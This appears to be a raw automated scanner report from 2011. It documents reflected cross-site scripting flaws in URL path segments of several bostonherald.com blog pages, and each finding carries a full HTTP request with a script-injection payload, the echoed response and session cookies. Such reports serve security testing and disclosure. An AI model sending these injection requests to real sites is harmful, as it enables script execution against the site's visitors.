GET /blogs/entertainment/guestlisted/index.php/20114afcc"><script>alert(1)</script>d82b4897c0c/01/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 04:09:39 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 04:09:22 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 32264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <TITLE>BostonHerald.com ...[SNIP]... <form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/20114afcc\"><script>alert(1)</script>d82b4897c0c/01/27/van-halen-recording-with-celine-dion-producer/"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70037"><script>alert(1)</script>7feba13b723 was submitted in the REST URL parameter 6. This input was echoed as 70037\"><script>alert(1)</script>7feba13b723 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/entertainment/guestlisted/index.php/2011/0170037"><script>alert(1)</script>7feba13b723/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 04:10:34 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 04:10:17 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 32264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <TITLE>BostonHerald.com ...[SNIP]... <form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/0170037\"><script>alert(1)</script>7feba13b723/27/van-halen-recording-with-celine-dion-producer/"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95c27"><script>alert(1)</script>81822d7f333 was submitted in the REST URL parameter 7. This input was echoed as 95c27\"><script>alert(1)</script>81822d7f333 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/entertainment/guestlisted/index.php/2011/01/2795c27"><script>alert(1)</script>81822d7f333/van-halen-recording-with-celine-dion-producer/ HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 04:10:56 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 04:10:40 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 32264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <TITLE>BostonHerald.com ...[SNIP]... <form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/01/2795c27\"><script>alert(1)</script>81822d7f333/van-halen-recording-with-celine-dion-producer/"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3652"><script>alert(1)</script>947a9457054 was submitted in the REST URL parameter 8. This input was echoed as d3652\"><script>alert(1)</script>947a9457054 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producerd3652"><script>alert(1)</script>947a9457054/ HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 04:11:13 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 04:10:56 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 32264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <TITLE>BostonHerald.com ...[SNIP]... <form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producerd3652\"><script>alert(1)</script>947a9457054/"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ef4"><script>alert(1)</script>1dd41ef465f was submitted in the REST URL parameter 5. This input was echoed as 19ef4\"><script>alert(1)</script>1dd41ef465f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/news/lone_republican/index.php/201119ef4"><script>alert(1)</script>1dd41ef465f/01/26/cutting-the-state-police/ HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 04:07:33 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 04:07:16 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 28406
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <TITLE>BostonHerald.com ...[SNIP]... <form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/201119ef4\"><script>alert(1)</script>1dd41ef465f/01/26/cutting-the-state-police/"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dab"><script>alert(1)</script>b404e1442a7 was submitted in the REST URL parameter 6. This input was echoed as 13dab\"><script>alert(1)</script>b404e1442a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/news/lone_republican/index.php/2011/0113dab"><script>alert(1)</script>b404e1442a7/26/cutting-the-state-police/ HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 04:08:47 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 04:08:30 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 28406
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <TITLE>BostonHerald.com ...[SNIP]... <form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/0113dab\"><script>alert(1)</script>b404e1442a7/26/cutting-the-state-police/"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3824"><script>alert(1)</script>ec4b7781a2e was submitted in the REST URL parameter 7. This input was echoed as a3824\"><script>alert(1)</script>ec4b7781a2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/news/lone_republican/index.php/2011/01/26a3824"><script>alert(1)</script>ec4b7781a2e/cutting-the-state-police/ HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 04:09:37 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 04:09:20 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 28406
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <TITLE>BostonHerald.com ...[SNIP]... <form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/01/26a3824\"><script>alert(1)</script>ec4b7781a2e/cutting-the-state-police/"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0bb1"><script>alert(1)</script>0c6338846da was submitted in the REST URL parameter 8. This input was echoed as d0bb1\"><script>alert(1)</script>0c6338846da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-policed0bb1"><script>alert(1)</script>0c6338846da/ HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 04:10:41 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 04:10:24 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 28406
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <TITLE>BostonHerald.com ...[SNIP]... <form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-policed0bb1\"><script>alert(1)</script>0c6338846da/"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59440"><script>alert(1)</script>a90735c589b was submitted in the REST URL parameter 5. This input was echoed as 59440\"><script>alert(1)</script>a90735c589b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/sports/rap_sheet/index.php/201159440"><script>alert(1)</script>a90735c589b/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 04:01:54 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 04:01:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 57634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <TITLE>BostonHerald.com ...[SNIP]... <form id="searchform" method="get" action="/blogs/sports/rap_sheet/index.php/201159440\"><script>alert(1)</script>a90735c589b/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ea2b"><script>alert(1)</script>c53f3083bf9 was submitted in the REST URL parameter 5. This input was echoed as 8ea2b\"><script>alert(1)</script>c53f3083bf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/sports/red_sox/index.php/20118ea2b"><script>alert(1)</script>c53f3083bf9/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 04:03:17 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 04:03:01 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 32101
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <TITLE>BostonHerald.com ...[SNIP]... <form id="searchform" method="get" action="/blogs/sports/red_sox/index.php/20118ea2b\"><script>alert(1)</script>c53f3083bf9/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9bc2"><script>alert(1)</script>4c7b0ea2d57 was submitted in the REST URL parameter 6. This input was echoed as b9bc2\"><script>alert(1)</script>4c7b0ea2d57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blogs/sports/red_sox/index.php/2011/01b9bc2"><script>alert(1)</script>4c7b0ea2d57/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 04:04:16 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 29 Jan 2011 04:03:59 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 32101
